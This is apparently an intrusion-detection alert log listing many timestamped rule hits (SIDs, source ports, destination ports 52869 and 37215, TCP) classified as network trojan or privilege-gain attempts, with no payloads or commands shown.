                      Timestamp:07/20/24-23:05:59.171817
                      SID:2027339
                      Source Port:34596
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:15.435068
                      SID:2027339
                      Source Port:43386
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.365777
                      SID:2831300
                      Source Port:54962
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.334876
                      SID:2027339
                      Source Port:43658
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.037207
                      SID:2027339
                      Source Port:49594
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.515632
                      SID:2027339
                      Source Port:41090
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.592985
                      SID:2027339
                      Source Port:50576
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.576731
                      SID:2027339
                      Source Port:38140
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.062886
                      SID:2025132
                      Source Port:55654
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:15.141369
                      SID:2027339
                      Source Port:41404
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.159544
                      SID:2025132
                      Source Port:43094
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:50.515352
                      SID:2835222
                      Source Port:38848
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.498027
                      SID:2829579
                      Source Port:39850
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.708489
                      SID:2025132
                      Source Port:54226
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.447173
                      SID:2835222
                      Source Port:44944
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.508651
                      SID:2831300
                      Source Port:50842
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.176056
                      SID:2831300
                      Source Port:39862
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:15.553063
                      SID:2027339
                      Source Port:51278
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.515352
                      SID:2835222
                      Source Port:47652
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.101340
                      SID:2831300
                      Source Port:59942
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:46.887482
                      SID:2027339
                      Source Port:60012
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.308037
                      SID:2025132
                      Source Port:43552
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:46.767175
                      SID:2027339
                      Source Port:48086
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.890086
                      SID:2831300
                      Source Port:49056
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:34.624854
                      SID:2829579
                      Source Port:38644
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.476168
                      SID:2831300
                      Source Port:53750
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:04.098403
                      SID:2027339
                      Source Port:60872
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.334876
                      SID:2027339
                      Source Port:57524
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.495090
                      SID:2831300
                      Source Port:57590
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:25.686672
                      SID:2027339
                      Source Port:45832
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.421312
                      SID:2835222
                      Source Port:48528
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:15.755429
                      SID:2831300
                      Source Port:47304
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:56.120599
                      SID:2835222
                      Source Port:39904
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.638799
                      SID:2831300
                      Source Port:54558
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:39.055909
                      SID:2835222
                      Source Port:35850
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.099234
                      SID:2025132
                      Source Port:47044
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:34.664378
                      SID:2829579
                      Source Port:38972
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.767395
                      SID:2835222
                      Source Port:49572
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:31.730220
                      SID:2025132
                      Source Port:51060
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.384426
                      SID:2831300
                      Source Port:41354
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:33.830570
                      SID:2835222
                      Source Port:43494
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.435096
                      SID:2829579
                      Source Port:44508
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:34.627679
                      SID:2027339
                      Source Port:49360
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:20.646576
                      SID:2027339
                      Source Port:43270
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.671976
                      SID:2027339
                      Source Port:49438
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.327823
                      SID:2829579
                      Source Port:48436
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.792506
                      SID:2025132
                      Source Port:35532
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:08.034671
                      SID:2831300
                      Source Port:57322
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.460913
                      SID:2831300
                      Source Port:56508
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.557712
                      SID:2027339
                      Source Port:41386
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.056582
                      SID:2829579
                      Source Port:53426
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.406154
                      SID:2831300
                      Source Port:34404
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:04.437943
                      SID:2027339
                      Source Port:53578
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.445623
                      SID:2027339
                      Source Port:57442
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.770020
                      SID:2027339
                      Source Port:46442
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.453957
                      SID:2835222
                      Source Port:54074
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.022964
                      SID:2835222
                      Source Port:58972
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.993302
                      SID:2025132
                      Source Port:41350
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:02.733116
                      SID:2831300
                      Source Port:40742
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.542495
                      SID:2027339
                      Source Port:48974
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.903540
                      SID:2831300
                      Source Port:33934
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:48.763322
                      SID:2835222
                      Source Port:41236
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.488878
                      SID:2831300
                      Source Port:57234
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:38.939891
                      SID:2835222
                      Source Port:53888
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.988990
                      SID:2835222
                      Source Port:58326
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.654418
                      SID:2027339
                      Source Port:53024
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.712957
                      SID:2027339
                      Source Port:43334
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:11.695372
                      SID:2027339
                      Source Port:58470
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:15.422064
                      SID:2027339
                      Source Port:42644
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.542034
                      SID:2829579
                      Source Port:56936
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.106041
                      SID:2835222
                      Source Port:55702
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:19.633139
                      SID:2027339
                      Source Port:45162
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.824928
                      SID:2025132
                      Source Port:35230
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.341196
                      SID:2831300
                      Source Port:47600
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:34.625707
                      SID:2835222
                      Source Port:41276
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.323629
                      SID:2829579
                      Source Port:44130
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.135703
                      SID:2835222
                      Source Port:40496
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.019762
                      SID:2027339
                      Source Port:52220
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:38.250934
                      SID:2027339
                      Source Port:35488
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.359662
                      SID:2835222
                      Source Port:39350
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.440208
                      SID:2027339
                      Source Port:35038
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.517784
                      SID:2831300
                      Source Port:51360
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.450149
                      SID:2027339
                      Source Port:36120
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:44.501694
                      SID:2831300
                      Source Port:54204
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.467316
                      SID:2831300
                      Source Port:53158
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.445836
                      SID:2027339
                      Source Port:58996
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.383835
                      SID:2027339
                      Source Port:54948
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:04.290199
                      SID:2027339
                      Source Port:49284
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:19.727778
                      SID:2025132
                      Source Port:49146
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.493809
                      SID:2027339
                      Source Port:49400
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:16.113185
                      SID:2831300
                      Source Port:50376
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:55.889998
                      SID:2835222
                      Source Port:34894
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.632555
                      SID:2027339
                      Source Port:37456
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.440705
                      SID:2027339
                      Source Port:50212
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.392392
                      SID:2027339
                      Source Port:42464
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.455250
                      SID:2027339
                      Source Port:48822
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.545166
                      SID:2831300
                      Source Port:51170
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.556240
                      SID:2027339
                      Source Port:43810
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:07.283476
                      SID:2025132
                      Source Port:52560
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:08.410817
                      SID:2025132
                      Source Port:57074
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:50.479091
                      SID:2829579
                      Source Port:44440
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:15.366643
                      SID:2831300
                      Source Port:58522
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:47.103906
                      SID:2835222
                      Source Port:45872
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.453720
                      SID:2831300
                      Source Port:44134
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.590968
                      SID:2027339
                      Source Port:55694
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.963204
                      SID:2027339
                      Source Port:48896
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.554950
                      SID:2027339
                      Source Port:40516
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.234287
                      SID:2027339
                      Source Port:50592
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.319175
                      SID:2025132
                      Source Port:60310
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:06.077998
                      SID:2831300
                      Source Port:47612
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.546679
                      SID:2027339
                      Source Port:54492
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:08:36.040271
                      SID:2027339
                      Source Port:43986
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.853184
                      SID:2829579
                      Source Port:34140
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.652423
                      SID:2829579
                      Source Port:60312
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.417625
                      SID:2027339
                      Source Port:52328
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.248123
                      SID:2027339
                      Source Port:34408
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.127943
                      SID:2829579
                      Source Port:40860
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:21.679115
                      SID:2025132
                      Source Port:40112
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.460569
                      SID:2835222
                      Source Port:44190
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.256977
                      SID:2831300
                      Source Port:57704
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.603782
                      SID:2027339
                      Source Port:59396
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.056582
                      SID:2829579
                      Source Port:53888
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.048662
                      SID:2025132
                      Source Port:55032
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:06.283235
                      SID:2027339
                      Source Port:48724
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.106701
                      SID:2025132
                      Source Port:52516
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.771186
                      SID:2027339
                      Source Port:33694
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.566382
                      SID:2831300
                      Source Port:50394
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.981798
                      SID:2027339
                      Source Port:55274
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.652423
                      SID:2829579
                      Source Port:36542
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:40.850874
                      SID:2831300
                      Source Port:47864
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:28.937691
                      SID:2027339
                      Source Port:57508
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:04.936056
                      SID:2831300
                      Source Port:53480
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.525575
                      SID:2027339
                      Source Port:45574
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.256977
                      SID:2831300
                      Source Port:57404
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:09.667246
                      SID:2027339
                      Source Port:57258
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.173904
                      SID:2027339
                      Source Port:37068
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.827265
                      SID:2027339
                      Source Port:33512
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:50.419958
                      SID:2025132
                      Source Port:50060
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.424850
                      SID:2835222
                      Source Port:44328
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.483611
                      SID:2027339
                      Source Port:45152
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.617233
                      SID:2831300
                      Source Port:51644
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:34.653253
                      SID:2829579
                      Source Port:41262
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.551205
                      SID:2831300
                      Source Port:55376
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.443719
                      SID:2027339
                      Source Port:50650
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.287260
                      SID:2027339
                      Source Port:33168
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.590266
                      SID:2831300
                      Source Port:56416
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:09.320815
                      SID:2831300
                      Source Port:56028
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:33.827209
                      SID:2835222
                      Source Port:47294
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.227912
                      SID:2025132
                      Source Port:38572
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.369729
                      SID:2027339
                      Source Port:34040
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.544693
                      SID:2027339
                      Source Port:40778
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.603344
                      SID:2831300
                      Source Port:56742
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:24.472445
                      SID:2025132
                      Source Port:47898
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:02.863188
                      SID:2831300
                      Source Port:51356
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:39.685213
                      SID:2829579
                      Source Port:47900
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.485640
                      SID:2027339
                      Source Port:57984
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.443720
                      SID:2831300
                      Source Port:45126
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:39.039093
                      SID:2835222
                      Source Port:43862
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.465013
                      SID:2027339
                      Source Port:55854
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:11.280682
                      SID:2027339
                      Source Port:56968
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.659617
                      SID:2829579
                      Source Port:46100
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.978394
                      SID:2027339
                      Source Port:60664
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.454601
                      SID:2831300
                      Source Port:37092
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.442841
                      SID:2831300
                      Source Port:49050
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.702332
                      SID:2027339
                      Source Port:36334
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.382026
                      SID:2027339
                      Source Port:38150
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:35.414252
                      SID:2027339
                      Source Port:53630
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.124334
                      SID:2027339
                      Source Port:47884
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:04.676388
                      SID:2025132
                      Source Port:47900
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.137269
                      SID:2829579
                      Source Port:34452
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.257734
                      SID:2831300
                      Source Port:53800
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:14.536716
                      SID:2025132
                      Source Port:39068
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.386265
                      SID:2025132
                      Source Port:44828
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.496382
                      SID:2831300
                      Source Port:39888
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.107636
                      SID:2027339
                      Source Port:37448
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.362477
                      SID:2025132
                      Source Port:57022
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.956352
                      SID:2025132
                      Source Port:33152
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.748553
                      SID:2829579
                      Source Port:52756
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.245949
                      SID:2829579
                      Source Port:49418
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.493809
                      SID:2027339
                      Source Port:44378
                      Destination Port:52869
                      Protocol:TCP
